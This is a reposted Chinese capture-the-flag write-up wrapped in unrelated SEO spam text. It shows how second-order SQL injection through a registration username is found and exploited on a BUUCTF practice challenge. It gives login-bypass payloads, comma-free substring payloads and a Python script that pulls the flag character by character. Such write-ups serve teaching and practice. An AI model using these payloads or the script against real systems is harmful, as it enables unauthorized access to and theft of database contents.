当前位置: 首页 > news >正文

江苏省建设工程地方标准网站有什么网站有小学生做的题目

江苏省建设工程地方标准网站,有什么网站有小学生做的题目,唐山网站建设冀icp备,网站制作策划建设大纲一、环境:在线测试平台 BUUCTF在线评测 (buuoj.cn) 二、进入界面先尝试万能账号 1or11# 换格式 hais1bux1 11or11# 三、万能的不行那我们就得想注册了,去register.php去看看 注册个账号 发现用户名回显,猜测考点为用户名处二次注入&…

一、环境:在线测试平台

BUUCTF在线评测 (buuoj.cn)

二、进入界面先尝试万能账号

1'or'1'='1'#

换格式 hais1bux1

1@1'or'1'='1'#

 

三、万能的不行那我们就得想注册了,去register.php去看看 

注册个账号

 发现用户名回显,猜测考点为用户名处二次注入,再次注册

 

很明显是有的 

 

三、如何解决?

在mysql中我们熟知一点是,+可以当做运算符 ,比如我们执行

select ‘1’+‘2a’

返回值为空

select '0'+database();

 

当我们用ASCII值来计算时,此时出现库第一位s的ASCII码值

select '0'+ascii(substr(database(),1,1));

因为题目中过滤掉了逗号,因此用from for来代替

0'+ascii(substr(database() from 1 for 1))+'0;

成功回显,因为过滤了information,只能猜字段名为flag,所以去用python脚本爬

脚本如下:

# -*- coding:utf-8 -*-
"""
@Author: lingchenwudiandexing
@contact: 3131579667@qq.com
@Time: 2024/2/19 1:04
@version: 1.0
"""
import requests
import logging
import re
from time import sleep# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"
# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)def search():flag = ''url = 'http://19f46d59-6746-4dce-84c1-73a67354f6d1.node5.buuoj.cn/'url1 = url+'register.php'url2 = url+'login.php'for i in range(100):sleep(0.3)#不加sleep就429了QAQdata1 = {"email" : "1234{}@123.com".format(i), "username" : "0'+ascii(substr((select * from flag) from {} for 1))+'0;".format(i), "password" : "123"}data2 = {"email" : "1234{}@123.com".format(i), "password" : "123"}r1 = requests.post(url1, data=data1)r2 = requests.post(url2, data=data2)res = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r2.text)res1 = re.search(r'\d+', res.group())flag = flag+chr(int(res1.group()))print(flag)print("final:"+flag)if __name__ == '__main__':search()

四、最终答案:

 

http://www.yayakq.cn/news/54591/

相关文章:

  • 网站如何做视频链接地址做网站划算还是做app划算
  • vs 手机网站开发wordpress评论头像不显示
  • 宁波网站建设制作公司哪家好用户注册网站开发
  • 网站建设与维护模板成都网站定制建设
  • 怎样注册网站帐号申请做网站编写
  • 佛山微信网站建设多少钱wordpress 自媒体主题
  • 建设卡开通网银网站广饶网站制作
  • wordpress 网站导航新网站一天做多少外链
  • 宽屏网站模板企业源码宁波建设检测
  • 网站建设 ui设计四川网站建设公司电话
  • 郑州企业网站制作怎么做建设网站企业网上银行
  • 公司网站建设都需要什么内容企业网站建设资金预算表
  • 网站页面怎么做导航直播网站开发好做么
  • 云虚服务器网站建设浪潮云网站建设
  • 个人网站广告联盟搭建妇女儿童心理咨询网站建设
  • 如何看网站是用什么程序做的深圳网络营销推广渠道
  • 北京三原色ps网站阿里巴巴网站特色
  • 如何进入网站国外室内设计网站推荐
  • 常德建设公司网站统一管理网站系统
  • 为什么做的网站有的有弹窗有的没有文章类网站程序
  • 备案编号不放在网站地方门户系统 哪家好
  • 做热饮店网站没有文章更新的网站怎么做优化
  • 外贸网站建设公司渠道深圳网站建设专家
  • 网站次页越秀金融大厦
  • 织梦网站怎么上传视频教程南京黑马程序员培训学校
  • 做网站和网站页面设计嘉兴 网站建设
  • 提升网站关键词排名做家装的有没有网站可以找工作
  • 做字画的网站百万综合文字论文网址的内容
  • 公众号中微网站开发雅思培训班价格一览表
  • 深圳网站建设软件开发公司哪家好手机上传网站源码